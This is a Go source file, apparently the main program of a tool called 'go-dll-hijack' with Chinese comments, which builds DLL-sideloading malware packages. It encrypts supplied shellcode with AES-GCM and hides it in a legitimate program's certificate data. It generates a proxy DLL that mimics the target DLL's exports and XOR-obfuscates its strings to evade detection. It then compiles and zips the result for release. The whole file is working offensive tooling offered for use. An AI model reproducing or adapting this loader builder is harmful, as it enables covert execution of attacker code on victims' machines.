package main

import (
	"archive/zip"
	"bytes"
	"dll-hiject/core"
	"dll-hiject/encoder"
	"dll-hiject/gogo"
	"encoding/binary"
	"encoding/hex"
	"flag"
	"fmt"
	"github.com/Binject/debug/pe"
	"io"
	"io/ioutil"
	"os"
	"path"
	"path/filepath"
	"regexp"
	"strings"
	"time"
)

func getExportFromDll(path string) []string {
	f, err := pe.Open(path)
	if err != nil {
		panic(err)
	}
	var p []string
	ex, _ := f.Exports()
	for _, v := range ex {
		p = append(p, v.Name)
	}
	f.Close()
	return p
}
func getExportFromMain(path string, dllname string) []string {
	f, err := pe.Open(path)
	if err != nil {
		panic(err)
	}
	var p []string
	ss, _ := f.ImportedSymbols()
	for _, funcX := range ss {
		hah := strings.Split(funcX, ":")
		funcName := hah[0]
		if strings.ToUpper(hah[1]) != strings.ToUpper(dllname) {
			continue
		}
		p = append(p, funcName)
	}
	f.Close()
	return p
}

func builder(shellcode []byte, rule core.Rule) (string, error) {
	// 创建临时临时目录
	baseDir, err := filepath.Abs("")
	if err != nil {
		panic(err)
	}
	tmpDir := filepath.Join(baseDir, "tmp", core.RandStringRunes(5))
	fmt.Println("tmpDir", tmpDir)
	// 复制代码模板到临时目录
	tmpTemplate := fmt.Sprintf("%s-template-%s", rule.TypeLoad, rule.Arch)
	err = DirCopy(filepath.Join(baseDir, "template", tmpTemplate), tmpDir)
	if err != nil {
		return "", err
	}
	// 复制程序模板到临时目录
	err = DirCopy(filepath.Join(baseDir, "template", rule.Path), tmpDir)
	if err != nil {
		return "", err
	}
	// 复制说明文件到临时目录
	readmeFile := filepath.Join(tmpDir, "readme.md")
	var readmeContent string
	readmeByte, err := ioutil.ReadFile(filepath.Join(baseDir, "template", "readme.md"))
	if err != nil {
		return "", err
	}
	readmeContent = strings.ReplaceAll(string(readmeByte), "{{dll}}", rule.Dll)
	readmeContent = strings.ReplaceAll(readmeContent, "{{mainprogram}}", rule.Main)
	err = ioutil.WriteFile(readmeFile, []byte(readmeContent), 0777)
	if err != nil {
		return "", err
	}

	// 加密shellcode并写入原始文件
	key := encoder.RandomAESKey()
	fmt.Println("key", key)
	s1, err := encoder.GCMEncrypt(key, shellcode)
	if err != nil {
		panic(err)
	}
	// 4byte长度(长度xor解密) + shellcode前12位
	var length uint32 = uint32(len(s1))
	bBuf := new(bytes.Buffer)
	err = binary.Write(bBuf, binary.LittleEndian, &length)
	s2 := append(bBuf.Bytes(), s1...)
	fmt.Println("find", s2[:12])

	err = core.WriteCert(filepath.Join(tmpDir, rule.Main), s2) // 写入文件
	if err != nil {
		return "", err
	}
	// 根据条件生成go dll源码
	// 生成 MainProgram PATTERNString DecryptKeyString 三个变量
	MainProgram := rule.Main
	PATTERNString := hex.EncodeToString(s2[:12])
	DecryptKeyString := hex.EncodeToString(key.Bytes())
	maingo := filepath.Join(tmpDir, "main.go")
	templateByte, err := ioutil.ReadFile(maingo)
	templateSource := string(templateByte)
	templateSource = strings.ReplaceAll(templateSource, "{{MainProgram}}", MainProgram)
	templateSource = strings.ReplaceAll(templateSource, "{{PATTERNString}}", PATTERNString)
	templateSource = strings.ReplaceAll(templateSource, "{{DecryptKeyString}}", DecryptKeyString)
	// 自动对代码内的字符串 xor加密
	reg1 := regexp.MustCompile(`\("(\S+)"\)`)
	x := reg1.FindAllStringSubmatch(templateSource, -1)
	for _, i := range x {
		p := core.RandBytes(4)
		result := core.XorEncode([]byte(i[1]), p) // str
		replacedResult := fmt.Sprintf("(string(xorEncode([]byte{%s}, []byte{%s})))", core.BytesOutput(result), core.BytesOutput(p))
		templateSource = strings.ReplaceAll(templateSource, i[0], replacedResult)
	}
	// 生成导出表
	var exportFuncs []string
	if rule.TypeLoad == "post-load" {
		exportFuncs = getExportFromDll(filepath.Join(tmpDir, rule.Dll))
	} else if rule.TypeLoad == "pre-load" {
		exportFuncs = getExportFromMain(filepath.Join(tmpDir, rule.Main), rule.Dll)
		if len(exportFuncs) == 0 {
			exportFuncs = getExportFromDll(filepath.Join(tmpDir, rule.Dll))
		}
	}
	var exportFuncString string
	for _, v := range exportFuncs {
		if strings.Index(v, "?") != -1 || strings.Index(v, "@") != -1 {
			continue
		}
		exportFuncString += fmt.Sprintf("//export %s\nfunc %s() {}\n\n", v, v)
	}
	templateSource = strings.ReplaceAll(templateSource, "{{exportFuncs}}", exportFuncString)

	err = ioutil.WriteFile(maingo, []byte(templateSource), 0777)
	if err != nil {
		return "", err
	}

	// 编译go dll到原始目录
	// gogo.GoCmd()
	return tmpDir, nil
}

// 打包成zip文件
func Zip(src_dir string, zip_file_name string) {

	// 预防：旧文件无法覆盖
	os.RemoveAll(zip_file_name)

	// 创建：zip文件
	zipfile, _ := os.Create(zip_file_name)
	defer zipfile.Close()

	// 打开：zip文件
	archive := zip.NewWriter(zipfile)
	defer archive.Close()

	// 遍历路径信息
	filepath.Walk(src_dir, func(path string, info os.FileInfo, _ error) error {

		// 如果是源路径，提前进行下一个遍历
		if path == src_dir {
			return nil
		}

		// 获取：文件头信息
		header, _ := zip.FileInfoHeader(info)
		header.Name = strings.TrimPrefix(path, src_dir)

		// 判断：文件是不是文件夹
		if info.IsDir() {
			header.Name += `/`
		} else {
			// 设置：zip的文件压缩算法
			header.Method = zip.Deflate
		}

		// 创建：压缩包头部信息
		writer, _ := archive.CreateHeader(header)
		if !info.IsDir() {
			file, _ := os.Open(path)
			defer file.Close()
			io.Copy(writer, file)
		}
		return nil
	})
}

// File copies a single file from src to dst
func FileCopy(src, dst string) error {
	var err error
	var srcfd *os.File
	var dstfd *os.File
	var srcinfo os.FileInfo

	if srcfd, err = os.Open(src); err != nil {
		return err
	}
	defer srcfd.Close()

	if dstfd, err = os.Create(dst); err != nil {
		return err
	}
	defer dstfd.Close()

	if _, err = io.Copy(dstfd, srcfd); err != nil {
		return err
	}
	if srcinfo, err = os.Stat(src); err != nil {
		return err
	}
	return os.Chmod(dst, srcinfo.Mode())
}

// Dir copies a whole directory recursively
func DirCopy(src string, dst string) error {
	var err error
	var fds []os.FileInfo
	var srcinfo os.FileInfo

	if srcinfo, err = os.Stat(src); err != nil {
		return err
	}

	if err = os.MkdirAll(dst, srcinfo.Mode()); err != nil {
		return err
	}

	if fds, err = ioutil.ReadDir(src); err != nil {
		return err
	}
	for _, fd := range fds {
		srcfp := path.Join(src, fd.Name())
		dstfp := path.Join(dst, fd.Name())

		if fd.IsDir() {
			if err = DirCopy(srcfp, dstfp); err != nil {
				fmt.Println(err)
			}
		} else {
			if err = FileCopy(srcfp, dstfp); err != nil {
				fmt.Println(err)
			}
		}
	}
	return nil
}

func main() {
	fmt.Println("Hello go-dll-hijack")
	// 初始化路径
	var shellcodeBin, setRule string
	flag.StringVar(&shellcodeBin, "bin", "", "shellcode路径")
	flag.StringVar(&setRule, "rule", "", "模板")
	flag.Parse()
	if shellcodeBin == "" || setRule == "" {
		flag.Usage()
		os.Exit(0)
	}

	shellcode, err := ioutil.ReadFile(shellcodeBin)
	fmt.Println("shellcode", shellcode)
	if err != nil {
		panic(err)
	}
	// 初始化json
	baseDir, err := filepath.Abs("")
	if err != nil {
		panic(err)
	}
	rules, err := core.CreateRules(filepath.Join(baseDir, "template", "data.json"))
	if err != nil {
		panic(err)
	}
	var pRule core.Rule
	for _, r := range *rules {
		if r.Path == setRule {
			pRule = r
			break
		}
	}
	if pRule.Path == "" {
		panic("setRule not found")
	}

	tmpDir, err := builder(shellcode, pRule)
	if err != nil {
		panic(err)
	}

	goconfig := gogo.GoConfig{
		DLLName: pRule.Dll,
		GOARCH:  pRule.Arch,
	}
	// build -ldflags "-s -w" -o vcruntime140.dll -buildmode=c-shared .
	_, err = gogo.GoCmd(goconfig, tmpDir)
	if err != nil {
		panic(err)
	}
	fmt.Println("ok,开始整理文件夹")
	err = os.Mkdir(filepath.Join(tmpDir, "release"), 0777)
	if err != nil {
		panic(err)
	}
	err = os.Mkdir(filepath.Join(tmpDir, "source"), 0777)
	if err != nil {
		panic(err)
	}
	filepathNames, err := filepath.Glob(filepath.Join(tmpDir, "*"))
	if err != nil {
		panic(err)
	}

	for i := range filepathNames {
		filename := filepathNames[i] //打印path
		base := filepath.Base(filename)
		if strings.HasSuffix(filename, ".dll") {
			newPath := filepath.Join(tmpDir, "release", base)
			err = os.Rename(filename, newPath)
			if err != nil {
				panic(err)
			}
		} else if strings.HasSuffix(filename, ".exe") {
			newPath := filepath.Join(tmpDir, "release", base)
			err = os.Rename(filename, newPath)
			if err != nil {
				panic(err)
			}
		} else if strings.HasSuffix(filename, ".go") {
			newPath := filepath.Join(tmpDir, "source", base)
			err = os.Rename(filename, newPath)
			if err != nil {
				panic(err)
			}
		} else if strings.HasSuffix(filename, ".h") {
			newPath := filepath.Join(tmpDir, "source", base)
			err = os.Rename(filename, newPath)
			if err != nil {
				panic(err)
			}
		} else if strings.HasSuffix(filename, "go.mod") {
			newPath := filepath.Join(tmpDir, "source", base)
			err = os.Rename(filename, newPath)
			if err != nil {
				panic(err)
			}
		}
	}
	fmt.Println("处理完毕")
	timeUnix := time.Now().Unix()
	filename := fmt.Sprintf("%s_%d.zip", pRule.Name, timeUnix)
	filename = filepath.Join(baseDir, "release", filename)
	Zip(tmpDir, filename)
	fmt.Println("生成成功->", filename, "<-")
	os.RemoveAll(tmpDir)
}
